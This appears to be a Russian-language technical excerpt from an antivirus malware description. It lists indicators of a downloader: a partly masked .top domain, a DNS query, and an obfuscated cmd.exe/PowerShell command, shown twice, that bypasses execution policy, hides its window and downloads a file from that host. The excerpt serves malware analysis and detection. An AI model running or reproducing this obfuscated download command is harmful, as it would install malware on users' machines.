Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^eR^SHE^lL^.EXe -exeCu^tiON^POl^ICy b^YP^ASS -nop^Ro^f^ILe ^-W^ind^oWsty^le Hid^dEn ^(NEw^-^ob^je^ct S^YSt^E^M^.N^Et^.WeB^Cl^IEn^t).DO^W^NLo^ADfilE^('http://fo###repu.t...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^eR^SHE^lL^.EXe -exeCu^tiON^POl^ICy b^YP^ASS -nop^Ro^f^ILe ^-W^ind^oWsty^le Hid^dEn ^(NEw^-^ob^je^ct S^YSt^E^M^.N^Et^.WeB^Cl^IEn^t).DO^W^NLo^ADfilE^('http://fo###repu.t...' (со скрытым окном)